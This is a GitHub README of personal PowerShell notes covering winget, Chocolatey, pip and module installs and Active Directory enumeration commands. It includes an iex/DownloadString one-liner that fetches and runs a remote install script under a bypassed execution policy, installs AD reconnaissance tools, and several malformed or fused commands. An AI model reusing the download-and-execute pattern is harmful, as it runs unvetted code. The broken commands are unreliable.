Skip to content

Latest commit

 

History

History
1887 lines (1878 loc) · 107 KB

README.md

File metadata and controls

1887 lines (1878 loc) · 107 KB

logo PowerShell - Scripts & Notes

📝 Table of Contents


🧐 About

List of PowerShell Commands, Notes, Links, etc.

Installation

Install PowerShell and other packages

Set-ExecutionPolicy Unrestricted
# If you have not configured TLS 1.2, any attempts to install the NuGet provider and other packages will fail
# Reference:
# https://docs.microsoft.com/en-us/powershell/scripting/gallery/installing-psget?view=powershell-7.2
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

[Net.ServicePointManager]::SecurityProtocol = [Net.ServicePointManager]::SecurityProtocol -bor [Net.SecurityProtocolType]::Tls12
# Update Help
Update-Help -Force -Verbose
Save-Help -DestinationPath "<DESTINATION_PATH>" -Force -Verbose
notepad++ (Get-PSReadLineOption | select -ExpandProperty HistorySavePath)

Windows Configurations

# If you're using a virtual machine, run the following PowerShell command to enable nested virtualization:
# Reference:
# https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-sandbox/windows-sandbox-overview#installation
Set-VMProcessor -VMName \<VMName> -ExposeVirtualizationExtensions $true

Install "winget"

# Install winget via GitHub
# Reference:
# https://phoenixnap.com/kb/install-winget
# https://docs.microsoft.com/en-us/learn/modules/explore-windows-package-manager-tool/?WT.mc_id=modinfra-0000-orthomas
# Naviate to "winget" GitHub page --> "Releases" section
https://github.com/microsoft/winget-cli/releases
# Scroll down to the Assets section and click the .msixbundle file to start the download
# Run the downloaded file and click Update
# Wait for the installation process to finish. The app may automatically install additional dependencies required for winget to work.
# Add "winget.exe" absolute file path ("C:\Users\<USER>\AppData\Local\Microsoft\WindowsApps") to "PATH" environment variable
# Verify the installation by running "winget" in PowerShell or Command Prompt.
# "winget" - Commands
winget install --id Microsoft.PowerToys
winget install powertoys --version 0.15.2
winget install --id Microsoft.PowerToys --version 0.15.2
winget upgrade --all
winget upgrade --id Microsoft.PowerToys
winget upgrade microsoft.powertoys -v 0.41.3
winget export -o myfiles.json
# Install "wingetcreate"
# Reference:
# https://github.com/microsoft/winget-create#readme
# https://docs.microsoft.com/en-us/learn/modules/explore-windows-package-manager-tool/6-contribute-to-repository
winget install wingetcreate

Install Chocolatey

Set-ExecutionPolicy Bypass -Scope Process -Force; iex ((New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1'))
choco install *git* -y --force --verbose

# gcc (for Windows)
choco install -y mingw --force --verbose

choco install -y anaconda3 
choco install -y aria2
choco install -y bloomrpc
choco install -y cascadiacode
choco install -y cascadiacodepl
choco install -y checksum
choco install -y conemu
choco install -y dbeaver
choco install -y ditto
choco install -y docker
choco install -y docker-desktop
choco install -y ffmpeg
choco install -y firacode 
choco install -y gitextensions
choco install -y jq
choco install -y kdiff3
choco install -y nodejs
choco install -y postman
choco install -y powershell-preview
choco install -y rufus
choco install -y sbt
choco install -y selenium
choco install -y selenium4
choco install -y sharex
choco install -y sql-server-management-studio
choco install -y sysinternals
choco install -y teracopy
choco install -y ussf
choco install -y wget
choco install accesschk -y --force --verbose
choco install ad* -y --force --verbose
choco install adexplorer -y --force --verbose
choco install adrecon -y --force --verbose
choco install adreports -y --force --verbose
choco install advanced-ip-scanner -y --force
choco install advanced-ip-scanner -y --force --verbose
choco install advanced-port-scanner -y --force --verbose
choco install advanced-renamer.install -y --force --verbose
choco install altools -y --force --verbose
choco install angryip -y
choco install angryip -y --force
choco install assoc -y --force --verbose
choco install awk -y
choco install aws -y
choco install aws-cli -y
choco install aws-sdk -y
choco install awscli -y
choco install AWSTools -y
choco install AWSTools.PowerShell -y
choco install azure-cli -y --force --verbose
choco install bloodhound -y --force --verbose
choco install brew -y --force --verbose
choco install build-tools -y --force --verbose
choco install buildtools -y --force --verbose
choco install bulkrenameutility -y --force
choco install certutil -y --force
choco install cmake -y
choco install cmder -y
choco install curl -y --force
choco install diff -y
choco install diff -y --force
choco install diskdump -y
choco install dsc.computermanagement --verbose
choco install find -y
choco install freerdp -y 
choco install grep -y --force
choco install grep -y --verbose --force
choco install grep3 -y
choco install gwmi -y
choco install ip-query -y
choco install ip-query -y --force
choco install jupyter-powershell -y
choco install jupyter-powershell -y --force
choco install lansweeper -y --force
choco install laps -y
choco install man -y
choco install man -y --force
choco install microsoft-build-tools -y
choco install nbrew -y
choco install ndiff -y
choco install ndiff -y --force
choco install neo4j -y
choco install neo4j-community -y --force --verbose
choco install network-miner -y --ignore-checksums
choco install nmap -y --force
choco install nmap -y --force --verbose
choco install nuget -y
choco install NugetPackageManager -y
choco install od -y
choco install oh-my-posh -y
choco install oh-my-posh -y --force
choco install openssh -params '"/SSHServerFeature /KeyBasedAuthenticationFeature"' -y
choco install openssh -params '"/SSHServerFeature /KeyBasedAuthenticationFeature"' -y --force --verbose
choco install openssh -params '"/SSHServerFeature /KeyBasedAuthenticationFeature"' y
choco install openssh -y --force --verbose
choco install openssl -y --force
choco install openssl -y --force --verbose
choco install pip -y
choco install pip -y --force
choco install pip3 -y
choco install pip_search
choco install pip_search -y --force
choco install poshadmin -y
choco install poshgit --force
choco install poshgit -y --force
choco install poshhosts -y
choco install powertoys -y
choco install procdot -y
choco install procdump -y
choco install psgit -y
choco install pslist -y
choco install pslist -y --force
choco install psreadline -y
choco install psreadline -y --force
choco install python2 -y --force
choco install python3 -y --force
choco install pywin32 --force
choco install renamer -y
CHOCO INSTALL RSAT -y
choco install search -y
choco install sed -y
choco install speccy -y
choco install sqlitebrowser -y
choco install sysinternals -y --force
choco install sysinternals -y --force --verbose
choco install sysmon -y
choco install tcpdump -y
choco install version -y
choco install version -y --force
choco install visualcpp-build-tools -y
choco install vmware-tools -y 
choco install wget -y
choco install what -y
choco install where -y
choco install whereis -y
choco install which -y
choco install which -y --force
choco install win32diskimager -y 
choco install windbg -y
choco install windows-iso-downloader -y 
choco install windows-repair-toolbox -y
choco install windowsisodownloader -y 
choco install windump -y
choco install winget -y
choco install winimage -y 
choco install winpcap -y
choco install winscp -y
choco install wireshark -y
choco install zbrew -y
choco install zenmap -y --force
choco install zenmap -y --ignore-checksums
choco search neo4j | choco install -y --force --verbose
help choco install | grep -i source

Install pip

py -m pip install --upgrade pip --force
py -m pip install pip_search -v
py -m pip install --user pipx
py -m pip install requests
pip install *bigquery*
pip install google-cloud-bigquery
pip install google-cloud-storage
pip install --upgrade google-api-python-client
pip install --upgrade google-auth-oauthlib
pip install --upgrade google-cloud-bigquery
pip install --upgrade google-cloud-storage -v
pip install --upgrade setuptools
pip install BeautifulSoup
pip install SQLAlchemy
pip install bottle
pip install google-api-utils
pip install google-cloud
pip install google-drive-api
pip install google_documents
pip install google_spreadsheet
pip install ip-query -v
pip install jupyter-console
pip install man
pip install matplotlib 
pip install notebook
pip install numpy
pip install openpyxl
pip install pandas
pip install psreadline
pip install py2exe
pip install pyscreenshot
pip install pyserial
pip install pyusb
pip install pywin32
pip install pyxlsb
pip install uspp
pip install which
pip install xlsxwriter
pip install zenmap

Install Tools

# Install the following helpful tools for when dealing with Active Directory:

"Active Directory Replication Status Tool (ADREPLSTATUS)"
https://www.microsoft.com/en-gb/download/details.aspx?id=30005
Use this tool to review the replication status of an AD environment

"Microsoft System Center Management Pack for ADDS"
https://www.microsoft.com/en-us/download/details.aspx?id=54525
The Management Pack for Windows Server Active Directory Domain Services. Monitors Windows Server 2016, 2019 and 2022 Domain Controllers and domain health.
he Active Directory® Management Pack provides both proactive and reactive monitoring of your Active Directory deployment. It monitors the overall health of the Active Directory system and alerts you to critical performance issues. The monitoring provided by this management pack includes monitoring of the domain controllers and monitoring of health from the perspective of clients utilizing Active Directory resources. To monitor the domain controllers, the Active Directory Management Pack provides a predefined, ready-to-run set of processing rules, monitoring scripts, and reports that are designed specifically to monitor the performance and availability of the Active Directory domain controllers. The client in your environment might experience connectivity and service issues even though the domain controller appears to be operating correctly. The Active Directory Domain Member Management Pack, included in the Active Directory Management Pack, helps to identify these issues. This management pack monitors the services provided by the domain controller. It provides information in addition to that collected directly on the domain controller about whether they are available by running synthetic transactions against the directory service, such as Lightweight Directory Access Protocol (LDAP) binds and LDAP pings. In addition to health monitoring capabilities, this management pack provides a complete Active Directory monitoring solution by monitoring the health of vital processes that your Active Directory deployment depends upon, including the following: • Replication • Lightweight Directory Access Protocol (LDAP) • Domain Controller Locator • Trusts • Net Logon service • File Replication Service (FRS) • Intersite Messaging service • Windows Time service • Active Directory Web Services (ADWS) • Active Directory Management Gateway Service • Key Distribution Center (KDC) • Monitoring service availability • Collecting key performance data • Providing comprehensive reports, including reports about service availability and service health and reports that can be used for capacity planning With this management pack, information technology (IT) administrators can automate one-to-many management of users and computers, simplifying administrative tasks and reduce IT costs. Administrators can efficiently implement security settings, enforce IT policies, and minimize service outages.

Install Module

[Net.ServicePointManager]::SecurityProtocol = [Net.ServicePointManager]::SecurityProtocol -bor [Net.SecurityProtocolType]::Tls12
Get-Module -ListAvailable PackageManagement, PowerShellGet
Install-PackageProvider Nuget –Force
Set-ExecutionPolicy RemoteSigned
Install-Module –Name PowerShellGet –Force -AllowClobber
Update-Module -Name PowerShellGet
Set-PSRepository -Name PSGallery -InstallationPolicy Trusted

References:
https://docs.microsoft.com/en-us/powershell/scripting/gallery/installing-psget?view=powershell-7.2

"How to Install and Update PowerShell 7"
https://www.thomasmaurer.ch/2019/07/how-to-install-and-update-powershell-7/

"Update PowerShellGet and PackageManagement"
https://www.thomasmaurer.ch/2019/02/update-powershellget-and-packagemanagement/

Install-Module -Name PowerShellGet -Force -Verbose
Install-Module PSReadLine -Force -Verbose
Install-Module PSScriptTools -Force -Verbose
Install-Module pester -SkipPublisherCheck -Force -Verbose
Install-Module -Name ActiveDirectoryTools -Force -Verbose
Update-Module -Verbose
Get-Module -ListAvailable -All
# Troubleshooting
# Re-registering PS default repository
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Unregister-PSRepository -Name PSGallery
Register-PSRepository -Default
Set-PSRepository -Name PSGallery -InstallationPolicy Trusted
Find-Module ActiveDirectory -Verbose
# GitHub - Modules
Install-Module psgithub -Force -Verbose
Import-Module psgithub -Force -Verbose
Get-Command -Module psgithub
find-module *active*dir* | Install-Module -Force -Verbose
find-module *active*directory* | Install-Module -Force -Verbose
find-module *activedir* | install-module -Force -Verbose
find-module *adenum* | Install-Module -Force -Verbose
find-module *azuread* | Install-Module -Force -Verbose
find-module *dns* | Install-Module -Force -Verbose
Find-Module *Excel* | Install-Module -Force -Verbose
find-module *hist* | Install-Module -Force -Verbose
Find-Module *msol* | Install-Module -Force -Verbose
Find-Module *office365* | Install-Module -Force -Verbose
Find-Module *vm*cli* | Install-Module -Force -Verbose
Find-Module -Name *qad* -Repository PSGallery | Install-Module -Force -Verbose
Find-Module -Name *session* -Repository PSGallery | Install-Module -Force -Verbose
Find-Module -Name *session* -Repository PSGallery | Sort-Object -Property Name | Format-Table -Property Name -HideTableHeaders | Install-Module *
Find-Module -Name *session* -Repository PSGallery | Sort-Object -Property Name | Format-Table -Property Name -HideTableHeaders | Install-Module * -Force -Verbose
Find-Module -Name *session* -Repository PSGallery | Sort-Object -Property Name | Format-Table -Property Name -HideTableHeaders | Install-Module -Force -Verbose | tee C:\Exclusions\temp\output_2022-04-13.txt
Find-Module -Name *session* -Repository PSGallery | Sort-Object -Property Name | Format-Table -Property Name -HideTableHeaders | Install-Module -Force -Verbose | tee C:\Exclusions\temp\output_2022-04-13.txt
Find-Module -Name *session* -Repository PSGallery | Sort-Object -Property Name | Format-Table -Property Name -HideTableHeaders | Install-Module -Force -Verbose| tee C:\Exclusions\temp\output_2022-04-13.txt
Find-Module -Name CertificateDsc -Repository PSGallery | Install-Module -Force -Verbose
Find-Module -Name Pester | Install-Module -Force -Verbose
Find-Module -Name PowerShellGet | Install-Module -Force -Verbose -AllowClobber
find-module active*dir* | Install-Module -Force -Verbose
Find-Module nx* | Install-Module -Force -Verbose
Find-Module vmware.* | Install-Module -Force -Verbose
Install-Module -Name 'Az' -Force -Verbose
Install-Module -Name 'PSWinReportingV2' -Force -Verbose
Install-Module -Name *hostname* -Force -Verbose
Install-Module -Name ActiveDirectory -Force -Verbose
Install-Module -Name ActiveDirectoryCmdlets -Force -Verbose
Install-Module -Name ActiveDirectoryDsc -Repository PSGallery -Force -Verbose -SkipPublisherCheck
Install-Module -Name ActiveDirectoryDsc -Verbose -Force
Install-Module -Name ActiveDirectoryTools -Force -Verbose
Install-Module -Name ADAudit -Force -Verbose
Install-Module -name ADReportingTools -Force -Verbose
Install-Module -Name ARTools -Repository PSGallery -Force -Verbose
Install-Module -Name AzureAD -Force -Verbose
Install-Module -Name AzureADIncidentResponse -Force -Verbose
Install-Module -Name Cim -Force -Verbose
Install-Module -Name CimSession -Force -Verbose
Install-Module -Name CimSweep -Force -Verbose
Install-Module -Name ComputerManagementDsc -Repository PSGallery -Verbose -Force
Install-Module -Name Convert-WindowsImage -Force -Verbose
Install-Module -Name EnhancedHTML2 -Force -Verbose
Install-Module -Name Env -Force -Verbose
Install-Module -Name Find-SMBShare -Force -Verbose
Install-Module -Name FreshBuild -Scope AllUsers -Force -Verbose
Install-Module -Name Get-ADUserCertificate -Force -Verbose
Install-Module -Name Get-ComputerSystem -Force -Verbose
Install-Module -Name Get-IPGeolocation -Force -Verbose
Install-Module -Name Get-RemoteCert -Force -Verbose
Install-Module -Name Get-WebCertificate -Force -Verbose
Install-Module -Name Get-WmiObject -Force -Verbose
Install-Module -Name Microsoft.Online.SharePoint.PowerShell -Force -Verbose
Install-Module -Name MSOnline -Force -Verbose
Install-Module -Name NetworkingDSC -Force -Verbose
Install-Module -Name NTFSSecurity -Force -Verbose
Install-Module -Name NuGet -Force -Verbose
Install-Module -Name OpenSSL -Force -Verbose
Install-Module -Name Pester -Force -Verbose
Install-Module -Name PnP.PowerShell -Force -Verbose
Install-Module -Name PowerShell.X509Certificate.Utility -Force -Verbose
Install-Module -Name PowerShellGet -Force -Verbose -AllowClobber
Install-Module -Name PowerShellGet -RequiredVersion 1.6.5 -Force -Verbose
Install-Module -Name PowerUpSQL -Force -Verbose -AllowClobber
Install-Module -Name PS.ActiveDirectoryTools -Force -Verbose
Install-Module -Name Pscx -Force -Verbose
Install-Module -Name PSFalcon -Scope CurrentUser -Verbose -Force
Install-Module -Name PSGalleryModule -Force -Verbose
Install-Module -Name PSPackageProject -Repository PSGallery -Force -Verbose
Install-Module -Name PSSubnetScan -Force -Verbose
Install-Module -Name PSWriteHTML -AllowClobber -Force -Verbose
Install-Module -Name RDPCertificate -Force -Verbose
Install-Module -Name S.DS.P -Force -Verbose
Install-Module -Name SecurityPolicyDSC -Force -Verbose
Install-Module -Name Test-ActiveDirectory -Force -Verbose
Install-Module -Name Testimo -AllowClobber -Force -Verbose
Install-Module -Name TlsCertificateValidation -Force -Verbose
Install-Module -Name xPSDesiredStateConfiguration, xWebAdministration -Force -Verbose
Install-Module -Name xSmbShare -Force -Verbose
Install-Module 365tools -Force -Verbose
Install-Module ActiveDirectory -Force -Verbose
install-module activedirectorycmdlets -Force -Verbose
install-module activedirectorydsc -Force -Verbose
install-module activedirectorystig -Force -Verbose -AllowClobber
install-module ad* -Force -Verbose
Install-Module ADDSActiveAccountAudit -Force -Verbose
Install-Module ADDSDeployment -Force -Verbose
Install-Module adessentials -Force -Verbose
Install-Module ADFSToolkit -Force -Verbose
Install-Module adgraph -Force -Verbose
Install-Module admanagement -Force -Verbose
install-module ADManagement -Force -Verbose -AllowClobber
Install-Module AdminToolbox -Allowclobber -Force -Verbose
Install-Module AdminToolbox.EndpointManagement -Force -Verbose
Install-Module admintoolbox.filemanagement -Force -Verbose
install-module adsec -Force -Verbose
install-module adtools -Force -Verbose
install-module adusermanagement -Force -Verbose
Install-Module advancedadmanagement -Force -Verbose
Install-Module AutomatedLab -SkipPublisherCheck -AllowClobber -Force -Verbose
Install-Module AWS -Force -Verbose
Install-Module awspowershell -Force -Verbose
Install-Module Az -Force -Verbose
Install-Module AzureAD -Force -Verbose
Install-Module AzureADAssessment -Force
Install-Module AzureADAssessment -Force -Verbose
Install-Module Backup, PSBackup, checkbackups, backuprepos -Force -Verbose
Install-Module baseencoder -Force -Verbose
Install-Module baseencoder -Force -Verbose -SkipPublisherCheck
Install-Module CertUtil -Force -Verbose
Install-Module computermanagement -Force -Verbose
Install-Module computermanagement -Force -Verbose -allowclobber
Install-Module ComputerManagementDsc -Force -Verbose
install-module cwindowsservicedsc -Force -Verbose
Install-Module dnsserverdsc -Force -Verbose
Install-Module dotnet.tools -Force -Verbose
Install-Module ExcelCmdlets -Force -Verbose
install-module find-gitrepository -Force -Verbose
install-module find-gitrepository -force -verbose
Install-Module find-string -Force -Verbose
Install-Module forensics -Force -Verbose
Install-Module forestmanagement -Force -Verbose
Install-Module ftp -Force -Verbose
install-module get-adcomputer -Force -Verbose
install-module get-content -Force -Verbose
install-module get-content -Force -Verbose -SkipPublisherCheck
Install-Module Get-PowerShell7 -Force -Verbose
install-module get-qadobject -Force -Verbose
Install-Module GitAutomation -Force -Verbose
install-module githubcmdlets -Force -Verbose
install-module githubmoduleinstaller -Force -Verbose
Install-Module ImportExcel -Force -Verbose
Install-Module ImportwORD -Force -Verbose
Install-Module InvokeBuild -Force -Verbose
Install-Module LocalPSRepository -Force -Verbose
Install-Module Microsoft.Online.SharePoint.PowerShell -Force -Verbose
Install-Module Microsoft.PowerShell.ConsoleGuiTools -Force -Verbose
install-module microsoft.powershell.graphicaltools -Force -Verbose -AllowClobber
install-module Microsoft.PowerShell.Management -Force -Verbose
install-module microsoft.powershell.remotingtools -Force -Verbose
Install-Module MSAL.PS -SkipPublisherCheck -Force -Verbose
Install-Module MSAL.PS -SkipPublisherCheck find-module *active*dir* | Install-Module -Force -Verbose
Install-Module NetworkingDsc -Force -Verbose
Install-Module Office365 -Force -Verbose
Install-Module Office365.connect -Force -Verbose
Install-Module Office365Toolkit -Force -Verbose
Install-Module Office365Toolkit find-module *active*dir* | Install-Module -Force -Verbose
Install-Module PackageManagement -Force -Verbose
Install-Module pChecksAD -Force -Verbose
Install-Module pester -Force -Verbose -SkipPublisherCheck
Install-Module posh-dotnet -Force -Verbose
Install-Module Posh-Git -Force -Verbose
Install-Module powerforensics -Force -Verbose
Install-Module PowerForensicsPortable -Force -Verbose
Install-Module powerforensicsv2 -Force -Verbose
Install-Module PowerGit -Force -Verbose
install-module powershell*tools -Force -Verbose
install-module powershellclitools -Force -Verbose
Install-Module -Name PowerShellGet -Force -Verbose -AllowClobber
install-module powershellmoduletools -Force -Verbose
install-module powershellprotools -Force -Verbose -AllowClobber
install-module powershelltools -Force -Verbose -AllowClobber
Install-Module PSADAudit -Force -Verbose
Install-Module psadtoolkit -Force -Verbose
Install-Module PSCertUtils -Force -Verbose -AllowClobber
Install-Module psdiagnostics -Force -Verbose
Install-Module PSEventViewer -Force -Verbose
Install-Module PSEverything -Force -Verbose
Install-Module PSExporter,configexport,exportbase64certificate,exportcertfromrawdata -Force -Verbose
Install-Module PSGit -Force -Verbose
install-module psgithub -Force -Verbose
Install-Module PSKoans -Force -Verbose
Install-Module psneo4j -Force -Verbose
Install-Module PSReadLine -Force -Verbose
Install-Module PSReleaseTools -Force -Verbose
Install-Module PSScriptTools -Force -Verbose
Install-Module pssearch -Force -Verbose
Install-Module PSSharedGoods -Force -Verbose
Install-Module psstringscanner -Force -Verbose
Install-Module pssysadmintoolkit -Force -Verbose
Install-Module pstools -Force -Verbose
Install-Module PSTypeExtensionTools -Force -Verbose
Install-Module PSVMware -Force -Verbose
Install-Module pswindowsupdate -Force -Verbose
Install-Module PSWinReporting -Force -Verbose
install-module pswinreportingv2 -Force -Verbose
install-module pswmitoolkit -Force -Verbose
Install-Module PSWriteColor -Force -Verbose
Install-Module PSWriteExcel -Force -Verbose
Install-Module PSWriteHTML -Force -Verbose
install-module qadhealthcheck -Force -Verbose
Install-Module rdp -Force -Verbose
Install-Module samba -Force -Verbose
Install-Module Selenium -Force -Verbose
install-module serverconfigurationmanager -Force -Verbose
install-module servermanager -Force -Verbose
Install-Module sftp -Force -Verbose
Install-Module SharePoint -Force -Verbose
Install-Module SharePointOnlinePowerShell -Force -Verbose
Install-Module SharePointPowerShell -Force -Verbose
install-module showui -Force -Verbose
Install-Module SimpleIP -Force -Verbose
Install-Module smb -Force -Verbose
Install-Module snmp -Force -Verbose
Install-Module SQLSERVER -Force -Verbose
Install-Module sqlserver -Force -Verbose
Install-Module Testimo -Force -Verbose
install-module Update-GitRepository -Force -Verbose
Install-Module VMware.Vimautomation.core -Force -Verbose
Install-Module vssetup -Force -Verbose
install-module windowsbox -Force -Verbose
install-module windowsbox.vmguesttools -Force -Verbose
install-module windowsimagetools -Force -Verbose
install-module windowstoolkit -Force -Verbose
install-module winget -Force -Verbose
Install-Module WordDoc, PSWriteWord, PSWordXml, PSWord, PSWordModule -Force -Verbose
install-module xActiveDirectory -Force -Verbose
Install-Module xCertificate -Force -Verbose
Install-Module xPSDesiredStateConfiguration -Force -Verbose
Install-Module xWindowsRestore -Force -Verbose
Install-module xwineventlog -Force -Verbose
Install-Module xJEA -Force -Verbose
Import-Module xJEA -Force -Verbose
Install-Module -Name AzureAD -Force -Verbose
Import-Module -Name AzureAD -Force -Verbose
Install-Module AzureRM -Force -Verbose
Import-Module AzureRM -Force -Verbose

Install Script

Install-Script -Name CertificateScanner
Install-Script -Name Download-AllGalleryModules
Install-Script -Name Get-ComputerInfo
Install-Script -Name GettingTLSVersionsFromAllComputers
Install-Script -Name PSGalleryInfo
Install-Script -Name PSGalleryModule
Install-Script -Name set-nsssl

git - Update all local repos

cd <GITHUB-PROJECTS-FOLDER-PATH>
Get-ChildItem -Path "C:\github-projects" | foreach {git -C $_.FullName pull --force --all --recurse-submodules --verbose}

PowerShell Configuration

# Force PowerShell to use a more secure protocol, like TLS 1.2
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
# Output the secure protocols that will be used
[Net.ServicePointManager]::SecurityProtocol
# Example of how to set "PSModulePath"
$Env:PSModulePath = $Env:PSModulePath + ";C:\Program Files\PowerShell\Modules;c:\program files\powershell\7\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\Universal\Modules"
# Output PowerShell Module folder paths
$env:PSModulePath -split ';'
# Get PowerShell "profile.ps1" file locations
$PROFILE | Get-Member -Type NoteProperty
# Update PowerShell help files to your local system
Get-Help * -Parameter ComputerName
Update-Help -Force -Verbose
Save-Help -DestinationPath "<DESTINATION_PATH>" -Force -Verbose
# Show the help for install module, list the PS Get version to understand the paths for scope
Get-Help Install-Module
$env:PsModulePath -Split ";"
Get-Module PowerShellGet -ListAvailable

Usage

Help Command

# Show the help for parameter "ComputerName"
Get-Help * -Parameter ComputerName
Update-Help -Force -Verbose
Save-Help -DestinationPath "<DESTINATION_PATH>" -Force -Verbose
# Show the help for install module, list the PS Get version to understand the paths for scope
Get-Help Install-Module
$env:PsModulePath -Split ";"
Get-Module PowerShellGet -ListAvailable
# Troubleshooting
# Force PowerShell to use a more secure protocol, like TLS 1.2
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
# Output the secure protocols that will be used
[Net.ServicePointManager]::SecurityProtocol
# Re-registering PS default repository
Unregister-PSRepository -Name PSGallery
Register-PSRepository -Default
Set-PSRepository -Name PSGallery -InstallationPolicy Trusted
Find-Module ActiveDirectory -Verbose

General

# Get-PSRepository | Format-List

Modules

# List modules loaded in to this current PowerShell session
Get-Module
# List modules that are available for use on this computer 
Get-Module -ListAvailable
# Do a Get-Module to see the ExportedCommands property to identify what commands are in a module
# Call the ExportedCommands property so it formats nicely
(Get-Module ActiveDirectory).ExportedCommands
# Search for PowerShell Module containing "*Excel*" and that was published within the past year
Find-Module *Excel* | Select-Object -Property Name, PublishedDate | Where-Object { ( $_.PublishedDate -ge ((Get-Date).AddYears(-1)) ) -and ( $_.PublishedDate -lt (Get-Date)) } | Sort-Object -Property PublishedDate -Descending
Find-Module *install*
Find-Module -Repository PSGallery
Find-Module -Name *pip*
Find-Module nx* | Format-Table Version, Name, Description
Find-Module nx* | Install-Module -Force
Find-Module -Tag 'Active Directory', 'ActiveDirectory', 'Active', 'Directory', 'AD'
Get-Command -Name '*Process'
Get-Module -ListAvailable -All -Verbose
Get-Module -ListAvailable | where { $_.path -match "System32" }
Install-Module -Name PowerShellGet -Force -Verbose -AllowClobber
Install-Module PSReadLine -Force -Verbose
Install-Module PSScriptTools -Force -Verbose
Install-Module pester -SkipPublisherCheck -Force -Verbose
Install-Module -Name ActiveDirectoryTools -Force -Verbose
Update-Module -Verbose
Get-Module -ListAvailable -All

Scripts

Find-Script *install*
Find-Script -Name *pip*
Install-Script -Name CertificateScanner
Install-Script -Name Download-AllGalleryModules
Install-Script -Name Get-ComputerInfo
Install-Script -Name GettingTLSVersionsFromAllComputers
Install-Script -Name PSGalleryInfo
Install-Script -Name PSGalleryModule
Install-Script -Name set-nsssl

PowerShell Command

# Get all command names locally installed
(Get-Command *).Name | Sort -Unique
# Get all command names locally installed (that start with "Get-AD")
(Get-Command *).Name | Sort -Unique | grep -i get\-ad
# Get all commands that deal with files
Get-Command -Noun File*
# Get cmdlets and functions that have an output type
Get-Command -Type Cmdlet | Where-Object OutputType | Format-List -Property Name, OutputType
Get-Command -Module PowerShellGet | Format-Wide -Column 3
Get-Command -ParameterName Cimsession
Get-Command -ParameterName ComputerName

Sort and Filter

Find-Module -Name *session* -Repository PSGallery | Sort-Object -Property Name | Format-Table -Property Name -HideTableHeaders
Get-Process | sort -Descending ws | select -First 3
$servers = Get-ADComputer -Filter * -Properties *
Get-CimInstance -ClassName Win32_NetworkAdapterConfiguration -Filter "DHCPEnabled = $true"
Get-WmiObject -Class Win32_UserAccount -Namespace "root\cimv2" -Filter "LocalAccount='$True'"
Get-ChildItem -Path C:\ -Filter *.sys -Force
Get-CimInstance -ClassName Win32_Process -Filter "Name='calculator.exe'"
Get-ChildItem hklm:\software | Get-Member ps*
# Sort by "Management*" AD Group Names
Get-ADGroup -Filter { Name -like "*Management*" } | Select-Object -Property Name | Sort-Object -Property Name -Unique
# Sort by "*admin*" AD Group Names
Get-ADGroup -Filter { Name -like "*admin*" } | Select-Object -Property Name | Sort-Object -Property Name -Unique
# Output the ten most recently created folders/files (via "CreationTime")
gci .\ | sort CreationTime -Descending | Select -First 10 | Format-Table -Property Name, CreationTime
# Output the ten most recently created folders/files (via "LastWriteTime")
gci .\ | sort LastWriteTime -Descending | Select -First 10 | Format-Table -Property Name, CreationTime
# Search files for the word "Excel"
gci .\ -Filter *.ps1 -Recurse | Select-String "Excel" -Verbose | Tee-Object -Path .\output_tee.txt
# Search files for "ADComputer
gci .\ -Recurse -include "*" | Select-String -Pattern "ADComputer" | Select filename, linenumber, line, path | Tee-Object -Path .\output_tee.txt

Reporting

# Export Excel file (with PivotChard and PivotTable, 3D Chart Type)
Get-Process | Export-Excel .\output.xlsx -WorksheetName Processes -ChartType PieExploded3D -IncludePivotChart -IncludePivotTable -Show -PivotRows Company -PivotData PM

CSV and Excel Files

# Get the column names of a ".csv" file
$data = Import-Csv -Path "C:\Temp\test.csv"
$ColNames = ($data[0].psobject.Properties).name

Active Directory

# Import "ActiveDirectory" Module
try {
    Import-Module ActiveDirectory -ErrorAction Stop
} catch {
    Write-Host "Unable to import module ActiveDirectory! Ensure it is available on this system." -BackgroundColor Yellow -ForegroundColor Black
    Break
}
try {
    Import-Module GroupPolicy -ErrorAction Stop
} catch {
    Write-Host "Unable to import module GroupPolicy! Ensure it is available on this system." -BackgroundColor Yellow -ForegroundColor Black
    Break
}
# Get all the PowerShell commands that start with "Get-AD*"
(Find-Module -Name *-ad* -Repository PSGallery).Name | ForEach-Object {Get-Command -Module $_.Name} | Export-Csv -Path .\report_all-modules_with_-ad_in-name.csv -Encoding UTF8 
Get-Command -Type All | Select-Object Source  | grep -i "get-ad"
# Trust
# Get the list of all trusts within the current domain
Get-ADTrust -Filter * -Property * | Export-Csv ad-trust-list_active-directory-details_2022-05-25.csv -NoTypeInformation -Encoding utf8
# Get the list of all trusts within the indicated domain
Get-ADTrust -Identity us.domain.corporation.local  
# Forest
Get-ADForest | Export-Csv ad-forest-list_active-directory-details_2022-05-25.csv -NoTypeInformation -Encoding utf8
# Get all domains in the current forest
(Get-ADForest).Domains                                                                                   
# Map only external trusts
(Get-ADForest).Domains | %{Get-ADTrust -Filter '(intraForest -ne $True) -and (ForestTransitive -ne $True)' -Server $_}
$ForestInfo = Get-ADForest -Current LocalComputer
Get-ADForest | Format-Table -Property *master*, global*, Domains
Get-ADForest google.com | Format-Table SchemaMaster,DomainNamingMaster
# Site
Get-ADSiteDetail | Export-Csv .\ad-site-detail_active-directory-details_2022-05-25.xlsx -NoTypeInformation -Encoding utf8
Get-ADSiteSummary | Export-Csv .\ad-site-summary_active-directory-details_2022-05-25.xlsx -NoTypeInformation -Encoding utf8
Get-ADObject -SearchBase (Get-ADRootDSE).ConfigurationNamingContext -filter "objectclass -eq 'site'"
# Get OU Details
Get-ADOrganizationalUnit -Filter * -Property * | Export-Csv ad-org-unit-list_active-directory-details_2022-05-25.csv -NoTypeInformation -Encoding utf8
Get-ADOrganizationalUnit -Filter * -Property * | Export-Csv -Append -Path .\output_get-adorganizationunit_all-properties.csv -NoTypeInformation -Encoding utf8
Get-ADOrganizationalUnit -Filter "Name –eq 'HR'")
Get-ADOrganizationalUnit -LDAPFilter "(name=Google)" -Property * | select distinguishedname
# Domain
Get-ADDomain | Export-Csv ad-domain-list_active-directory-details_2022-05-25.csv -NoTypeInformation -Encoding utf8
$DomainInfo = Get-ADDomain -Current LocalComputer
